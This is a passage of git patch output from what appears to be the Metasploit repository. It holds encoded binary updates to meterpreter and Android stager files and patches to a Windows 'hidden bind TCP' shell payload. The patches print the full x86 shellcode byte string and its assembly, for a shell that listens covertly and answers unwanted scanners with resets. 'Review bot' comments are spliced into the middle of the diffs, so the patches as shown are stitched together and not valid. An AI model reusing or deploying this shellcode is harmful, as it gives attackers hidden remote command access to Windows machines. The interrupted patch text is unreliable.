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 XZE3=CIsrJ%Av3_?G>GcV|MmU{+qYQd 
diff --git a/data/android/metstage.jar b/data/android/metstage.jar index 9a3d4d63152a411f0ef1545c9b25de6d6986e8c5..095c7b9a64a328b35850cdffccaaae6fcd8dca33 100644 GIT binary patch delta 1647 zcmV-#29Wv554#QyP)h>@6aWYa2mpm@XGD<>XC+(ka`AEj08mQ@2wpVAkVXIi07w7; z08mQ<1QY-W2nYa$YG*`|nj3$GmR)QVRTRh1%$GEUg4npsN)Ku(d)9 z)yh^#AWbL_GVD&%$0TP9JNh!&@|XGr|E!ZtyXy&Eh`L>A;7NEz}AIkNvGNB5T$qO4AI4f2Lc zbQAmq?tr`CZy;+#8Zf~oFac)43*cSwEw~D902#izzyR0_j)5|G5xfpQ2fu*p;5N7e z?t*`S7AG=53)l#Df`fnH2si;|!K>hH@ILqid;@*}SHW-KcW@ot1h;`=5Ve7Ruo(=2 zJlGE=!8CXloCasWIq(u#25*9Qz(?RS@RbqG8K#Qhns7^)Zc2b8XaOnEO3|FB0V_;9 z=m4Fd3#=2hc>rX=M$iZP!9&8oBgzGa{d5tBtRm48~(M`w{j}*_yy+=wW*t8}tM6tpwss#`}yko@j^e zXFKU4B@G9C{A>sMB#j<(54SVjx4PI9>i<2ld+ig7Z)tys$CUdwcA!l~rTb!W9>-C{ zVX_JuyA2h39D1K-pe;$`=-Y}_?prC$q;Iw0+6Q_K1$S(glScWNLWf`JF&;+W7+s>I z?pp@)VMP8Bi^b}fndpC`lQL#+LZ``uVP<-I6K13h^d{s;+jBA@am~+W=rwrHJl+3c z7iAKYDKmeOSwGo|>y}9i*L)^<#s=E2jmfSx{X0cp9qV1ju9w8#i1sM^N9(_Xq(Rb#UEd8yNE#z)f}{e;g)zY7G<6qj zzf=j_Qmz>Iq2q_SF(wzoJoVL^%Jz~M*ri-Gv}b>v+@upam2!n$^VEC)K1bL!Pd$Z_ z?VWW`=WO2(LOXN=KX-Jl5-e2n^kBWMx>OCF`P_bIam=%;)dIXQ&)tPn_E|gU2D$xq zXixa%T6iR^IQD#=QmakluE&RIzCTn8oBDRHw%u!Qi|n55&*nyhz;kRrPw6Hj4<=9T zYfXQ{10#9rT5GLG-ObJmnO_du@oy^=DU;ZnBNmT#tL+(9~3M zW<2;{rK*ONS}_dJ!D=eZAnQveFGHlqjvhOFfTSssrwXJ_74Rczn&ji7lsW$2wA+r~ zC*pgI^^i5YTz32tC5nxCAhqZPRfo0}gZY2Kc_*~1WiN0;rmjY~FIqQEL6csLmLA25 zLB(OW6{q0%)KWyvLgyK0fz_9^lH;L2=_P0JupQ2k<}A9^uu8ER)*NS7ZdYf#T6K<; znV?Lqvrf40WHs<=Vbqv{p{aDyePcdJc6~C~lIERAN9=B^QEZY^ECySuUY%~KIl*VhGw?sNqC;X6Fst)Ui!N%s`PlbmHau4U+D#gPf znqX4T+FlLGa&c&e)P;(RjOG%h3IG65O92rA6aW+e t2nYxOg=%L+UNppzlSl_X4uxuGM5-S$W8nn=0PqTvlm{;crUn22006oKAK(B0 delta 1790 zcmV@6aWYa2mn-Kyh4!W4zkP4t%)EJT-t6vFoON^0z7fjb4b1GWo45Y?W6QTQpL~D%{PiCmT{(a2 z_wv;?q8bsc&+X5W`2A`Uoub(O0QguU%0LdtMEIxMxb#8Z75CQ^qN@fJmFR#@Gzuoc zF>nIRg45tR@FF-57Qjp3J@5ti5&Q+Z;b#XJ2lK!OuYz~LC*W)F6SxD~5=4)IXTTY7 z9#p^*xBvoB2OHoe@D_jg5PS~42S0;fz;EDB@Hg|9BpLxlFbSr>JXisj!E4|OcoV!0 z-UlCn&%l@9I`|I!0&asl;2&UOO>>|J>;SvLKJW}U0ZxN?GhR2a)`qW_@Kd-bNi9r`w*?-Blc 
zTH-v;<4e(2V(X~W2$wQF!KFe^^PE#WPX!|;xooE?o_{QLthB_XMn#@a2OSZ49p&>R zXg^<*6b*CPK_`FtyeiG|HEE**d=27xEc{LLeB=8JM(pC!6f!|2z6J&z;x&!?tDwD?S65n%+us_B2 zj`j$7RtDLpq(L=122|| z)iLFvZQbya#Qx42-X57|jg;c$+p%Vzl|qbzsNSFv$6)aJmf*!nu(@;e8uJL-G48pG zd4^+I zm+zoD{AG_1z1~OJWzo; zKD#FD5;dP$iQ@N$C2HIyY?hFHE#sN&6=My=A>)5-p^ANK;Td4<-J}k$*a7LIuIEN$ zBu$VsMe-EtTq3zN0ZOElO0bpYsjp;vmB4o^g|hEOju#asm|TyFG}vgW*&9{gt`x$^ zUUCXEPUHl&fL)6;@c(_zvTKq0OBK6%$-PjpJ8yWGRP8V<<;uZ*(h-A)gq-gn~u6wK27WW$$He%w|leg zUVARKS8Z>pFz)+R$M%YpX)*F(iqv_(X>`|Ek$Ud8HlproX*jZ8c4{o=B4u05Cl^+n za&)f^QMumIX3{OT@w!{(p0~C%1K3IRL!YHVhBR|;mSC8Ck;S8$cBTK8LSi`KD zOkSE;SD$_H)De>ANS-T^Hdn%rq*omZ5} zPDxVagYxvcLXSxYpT=uztNPU8$H$HIw4xR>Zz%diW?GT=$-5P4Z_gNp>^FZ$$E19R zLc@luYKPjprM(%FHECu*>P_>n;4ADSFH6cRFRQO7B>CNhCVh~k<{6{)9oIO&viD-+ z469J{9II0EEUQuTJgZalOsiPJCwt%KIzUP$?_slJ0dXe(W3vYUwdWVv delta 86 zcmdnXx0jDEz?+#xgn@&DgCQhokJCiHbk*6Pi#`@HG6ZRF2yob$>1;m;BkIfzc&@~un diff --git a/data/meterpreter/ext_server_stdapi.jar b/data/meterpreter/ext_server_stdapi.jar index bef5cee0140fd78c4db9c9ac32eb29b3d7778bc5..b6a01cac095c0f8e799987555ea70dea3ae1b18e 100644 GIT binary patch delta 174 zcmV;f08#(`t^)q90+2NX8;47DkvT7apwL|vH)6q+TN#>>2HPY|(vP>dwTNyW^FH%t zN_6%?G3gs|wBF@v1(_6w&NfD$&2#2E$nNX?A|`!!rnUc;X(SFjBgAAdSXh!$6kOG|C;oj4d2MLy cqWT(ANbv@fK>-@G3<2-@G3<2d9 Date: Mon, 10 Mar 2014 12:13:10 +0100 Subject: [PATCH 045/853] Changed cmp eax by inc eax. Saved one byte --- .../x86/src/block/block_hidden_bind_tcp.asm | 5 ++-- .../singles/windows/shell_hidden_bind_tcp.rb | 25 +++++++++---------- 2 files changed, 15 insertions(+), 15 deletions(-) diff --git a/external/source/shellcode/windows/x86/src/block/block_hidden_bind_tcp.asm b/external/source/shellcode/windows/x86/src/block/block_hidden_bind_tcp.asm index fa8f31681a..3b708b9c48 100644 --- a/external/source/shellcode/windows/x86/src/block/block_hidden_bind_tcp.asm +++ b/external/source/shellcode/windows/x86/src/block/block_hidden_bind_tcp.asm 
@@ -80,8 +80,9 @@ wsaaccept:
 push edi ; socket descriptor
 push 0x33BEAC94 ; hash( "ws2_32.dll", "wsaaccept" )
 call ebp ; wsaaccept( s, 0, 0, &fnCondition, 0)
- cmp eax, -1 ; if error jump to condition function to wait for another connection
- jz condition
+ inc eax
+ jz condition ; if error (eax = -1) jump to condition function to wait for another connection
+ dec eax
 push edi ; push the listening socket to close
 xchg edi, eax ; replace the listening socket with the new connected socket for further comms
diff --git a/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb
index e63628d4bc..c28daa8bd4 100644
--- a/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb
+++ b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb
@@ -18,9 +18,9 @@ module Metasploit3
 super(merge_info(info,
 'Name' => 'Windows Command Shell, Hidden Bind TCP Inline',
 'Description' => 'Listen for a connection from certain IP and spawn a command shell.
- The shellcode will reply with a RST packet if the connection is not
- comming from the IP defined in AHOST. This way the socket will appear
- as "closed" helping us to keep our shellcode hidden from scanning tools.',
+ The shellcode will reply with a RST packet if the connections is not
+ comming from the IP defined in AHOST. This way the port will appear
+ as "closed" helping us to hide the shellcode.',
 'Author' =>
 [
 'vlad902', # original payload module (single_shell_bind_tcp)
@@ -28,7 +28,6 @@ module Metasploit3
 'Borja Merino ' # Add Hidden ACL functionality
 ],
 'License' => MSF_LICENSE,
- 'References' => ['URL', 'http://www.youtube.com/watch?v=xYBuaVNQjGA&hd=1'],
 'Platform' => 'win',
 'Arch' => ARCH_X86,
 'Handler' => Msf::Handler::BindHiddenTcp,
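Review bot: In the `@@ -80,8 +80,9 @@` hunk the comment on the new `jz condition` still says `(eax = -1)`, but by the time the jump is evaluated `inc eax` has already turned a -1 return into 0, and the added `inc eax` and `dec eax` are the only lines in the hunk without a comment. I would comment the three lines so the pairing is obvious: `inc eax ; -1 (error) becomes 0 and sets ZF`, `jz condition ; on error wait for another connection`, `dec eax ; restore the value returned by wsaaccept`. Only ZF is tested, so swapping `cmp` for `inc` does not change the branch, but the `dec eax` has to stay directly after the `jz` because the following `xchg edi, eax` uses the returned socket. The wsaaccept block starts before this hunk and continues after it.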
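Review bot: The rewritten description in the `@@ -18,9 +18,9 @@` hunk introduces a grammar error, `if the connections is not`, where the removed line had `connection`, and it keeps the misspelling `comming`. This string is what users read in the module info, so I would write `The shellcode will reply with a RST packet if the connection is not` and `coming from the IP defined in AHOST. This way the port will appear`. The `super(merge_info(...))` call starts before the hunk and continues after it.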
@@ -39,7 +38,7 @@ module Metasploit3
 {
 'LPORT' => [ 200, 'n' ],
 'AHOST' => [ 262, 'ADDR' ],
- 'EXITFUNC' => [ 364, 'V' ],
+ 'EXITFUNC' => [ 363, 'V' ],
 },
 'Payload' =>
 "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b" +
@@ -59,14 +58,14 @@ module Metasploit3
 "\xff\xff\x00\x00\x57\x68\xf1\xa2\x77\x29\xff\xd5\x53\x57\x68\xb7" +
 "\xe9\x38\xff\xff\xd5\x53\xe8\x17\x00\x00\x00\x8b\x44\x24\x04\x8b" +
 "\x40\x04\x8b\x40\x04\x2d\xc0\xa8\x01\x21\x74\x03\x31\xc0\x40\xc2" +
- "\x20\x00\x53\x53\x57\x68\x94\xac\xbe\x33\xff\xd5\x83\xf8\xff\x74" +
- "\xd4\x57\x97\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89" +
- "\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24" +
- "\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46" +
- "\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e" +
- "\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xe0\x1d\x2a\x0a" +
- "\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05" +
- "\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"
+ "\x20\x00\x53\x53\x57\x68\x94\xac\xbe\x33\xff\xd5\x40\x74\xd6\x48" +
+ "\x57\x97\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3" +
+ "\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c" +
+ "\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56" +
+ "\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56" +
+ "\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xe0\x1d\x2a\x0a\x68" +
+ "\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +
+ "\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"
 }
 ))
 end
From 3c95c021d003a741896a7e0d1ae04dffbde609e7 Mon Sep 17 00:00:00 2001
From: root
Date: Mon, 10 Mar 2014 12:17:20 +0100
Subject: [PATCH 046/853] Reference added
---
 modules/payloads/singles/windows/shell_hidden_bind_tcp.rb | 1 +
 1 file changed, 1 insertion(+)
diff --git a/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb
index c28daa8bd4..57f57f712a 100644
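Review bot: `'EXITFUNC' => [ 363, 'V' ]` in the `@@ -39,7 +38,7 @@` hunk is a hand-maintained byte offset into the `'Payload'` string, and nothing in the hunk says so or ties it to the assembly source. The move from 364 to 363 matches the one-byte shrink in the `@@ -59,14 +58,14 @@` hunk, and `LPORT` and `AHOST` are left alone, presumably because they sit before the edited bytes. A comment above the table such as `# Byte offsets into 'Payload'; recompute after reassembling block_hidden_bind_tcp.asm` would keep the next edit from patching the wrong byte. The hash holding these entries opens before the hunk.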
--- a/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb
+++ b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb
@@ -28,6 +28,7 @@ module Metasploit3
 'Borja Merino ' # Add Hidden ACL functionality
 ],
 'License' => MSF_LICENSE,
+ 'References' => ['URL', 'http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html'],
 'Platform' => 'win',
 'Arch' => ARCH_X86,
 'Handler' => Msf::Handler::BindHiddenTcp,
From 667bed890569cc5200eac376be38ed34fde79597 Mon Sep 17 00:00:00 2001
From: joe
Date: Mon, 10 Mar 2014 18:50:27 -0700
Subject: [PATCH 047/853] New multi-arch stagers.
---
 data/android/apk/AndroidManifest.xml | Bin 3536 -> 3540 bytes
 data/android/apk/classes.dex | Bin 10700 -> 10040 bytes
 data/android/apk/resources.arsc | Bin 1088 -> 580 bytes
 .../libs/armeabi-v7a/libdalvikstager.so | Bin 0 -> 13436 bytes
 data/android/libs/armeabi/libdalvikstager.so | Bin 0 -> 13432 bytes
 data/android/libs/mips/libdalvikstager.so | Bin 0 -> 5328 bytes
 data/android/libs/x86/libdalvikstager.so | Bin 0 -> 5220 bytes
 data/android/meterpreter.jar | Bin 37700 -> 38353 bytes
 data/android/metstage.jar | Bin 1851 -> 1851 bytes
 data/android/shell.jar | Bin 1853 -> 1853 bytes
 10 files changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 data/android/libs/armeabi-v7a/libdalvikstager.so
 create mode 100644 data/android/libs/armeabi/libdalvikstager.so
 create mode 100644 data/android/libs/mips/libdalvikstager.so
 create mode 100644 data/android/libs/x86/libdalvikstager.so
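Review bot: The `'References'` line added in the `@@ -28,6 +28,7 @@` hunk is a flat two-element array, whereas Metasploit module metadata normally lists references as an array of `[type, value]` pairs. With the flat form the framework may treat `'URL'` and the address as two separate entries instead of one URL reference; I have not confirmed how this framework version handles it. I would write `'References' => [ ['URL', 'http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html'] ],`. The reference line removed by the previous patch had the same flat shape, so this looks like a carry-over. The info hash starts before the hunk and continues after it.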
diff --git a/data/android/apk/AndroidManifest.xml b/data/android/apk/AndroidManifest.xml index 6ee7f3e36fed7e9e467fff4db6fd95f5a44848f9..57e86cd85b8f352caeb6fec49f73ddec852c075a 100644 GIT binary patch delta 285 zcmZ9{KS~2Z6vy%J+uhk+$gGIkB(W0$!9uXGu+9Zi2!a+G2&9Nj2o@o*2Z&9WTci+i z19ldkKp{u4unbngMt?RI4t$t-kN1apZLXR{OwOtRW1ok4aaaz4iQLJ%e8`t<8JtQ- z&SfG?Nh7$Fd)dfw3?o^}r<^1(l^5B_j)RtTq$eX;$g|YAoj+aF9Ye0^(bo-*F$2AC z=vQrH^}8X@{DHRoRh$u9 Mrubi1Rr;>|0DUhsL;wH) delta 320 zcmaLSFHb^I7{~G7bN|S7p1ZNhrrWu01{*;F!77lc^U-&dsqD3m1GL466wSOW^|)*$u3$ RO|u`JyM6!9_2SiC*cx>WG`0W$ 
diff --git a/data/android/apk/classes.dex b/data/android/apk/classes.dex index 3a45c8b3fbe7179ddfdaa76d4df59f50dc4e90ac..ff39e87f11448e4c3543e9611c6a19b1d18aa857 100644 GIT binary patch literal 10040 zcmai)3wRvWb;r-0nSE$?wO*}kOIjprt%of?q?P5TEXgnVB}=kpX)TOxFss$bT6;CS z+MSgp^1ulcNPvd4;5aSe0~$Uk5HJn!5eTUX2~Y~*9sE&R+|+3r$_F$}C`t1*{hvFt z@>&=e`?u%Zd(VB$x#!+Hn%!Z2($l#^a0R#p+zU>DH^A?~ zyfV}UL*T360q`PtAGphjmV(`29NY{}f|tR60#^l58CVW>fFY0r*MskZC&0_#H^3Pp zsszoT8yo~#@D1=ia0qzP;S!{9pbU2qEg0#GGU4Oj^}!KFY4hd~CM0N()* zfk(j)z?0x9@Kf+ScnQ1#-UerYvkLbLB49aK117eh96SeJ182amKuI-G2-Jc_papCMd%&e&1Y|%Cd} z2Yv?L1ZTjn!3W@vz%id_7N`bwpc$+M8$d7E2QCNWU;QSb!#5qK5+ z9J~d74Soau50uv6o;Cb*8I1SE#cY#ui zwFyc9mZ@B~vmmh?2q8}hWkQIO9fpKZAWR>@)f5I88lf3Nb*cmP0NVmB1Px#jSPYhc zrJxZsfe2^@yk9H_E5J&y3akceKr2`a+CV$#0PDbdumNlYn?NVn47Px+U>n#Dy1)+5 z4F*9B=wJjK0;3=S4ud1W4fuLtw&e$5C8-#abgG(6Qyoi*@!NU#zp=_+p)X z#~15Zdh$Yb>C1dO>{GtjhW*JGZ;7nGZTH3g<*O91&f{Sl*3UvOfn@)`2Oa;V&h4`e z&&6+{bNf6Ge6dXn$d6$KXX0XC@f`4VF<_nh+H327gno&wYiK;L`wH~g&@Z)ZDhu)( z3iRdzeNBPRpaf5oqs#**|!{{e7Rv=1nGh2{}s}QS#sEt4^U3ewdHOp1x4-j z9w{~Yij)!hG2|>nU>cI+>N%jIHpiZd)%kaj8vgyIluo(@(ut_!awk^Y813Vloj+kWU<|EF?NqhnO;m&Qa00HNLfekNExAjgY?_>vuqi#F z9^YKt;oXpB*u6MihI#psl!E>qvK%`a=T}hJmP_esnO;iQ*z)UA7SlH&Ls-3RA41Dt zw&kBo*+6F@tI*#~QhMlSDTDNFDZO+OvKsZCfDFTLk3!bi+Pw+!@!eM>LL0Sz=4eegPus1>`TZ?HA(CUqZS8Gx#@CzYHV% zM=2N3&mdc{8+}X4IrP_3E}=Ui-Jk^20KS}-pu2ga!^LY%0FFhzdMrWTx63_9^Sb2v zymosbS3o{xmwWBAYM1+v=Jxabb9ofyXHb4KC@v`f3G#O$Z9+CIfP#z9 zi^B2mLiz@jZ?(($teshYE6V#&eh1p;vCk~OALR$^`U=W-!fp>>{W4qUG3$1o0hue% zuY}I!Uz1Wuy}Z^s%hG|hDDflD%CDNvM>g^m`49d;KKnKm7944Ti=Z0;o(;=}+g}PB zC**#Cy~}Rbg?3fYf-*kyf+9LBDCh{P)oL3V%{wTn`czjluSS^yIqzl_I>mr-@*N%J-83`EFW+igDB%TtHD!AIxq+= zfw(&7gZY=8dkV6~TR|ZNSUS7}YrzOau-p2IYP|Ir#U|)Rcnj8o&#U`b-wYd{H{|<)%xB#Q zY~>ox&#Up+%o>^zScHARqt>>xqO1Y;U4tDb9d4sA#_@?VM}-`tjs!jPP>oDn_6MJAx5dhR+%?mnywJq*n4cz3Kh+6#KRjUI733+(uwEyzcWD zfktizzF!G+EUlx`-!3(yc@;h8 z^Le>e8*25=;u^gHd^Yx$;Ikv>uYEsnyMylYaSS-*TnajkIpHN0Qu-;_X@u8fNAe-! 
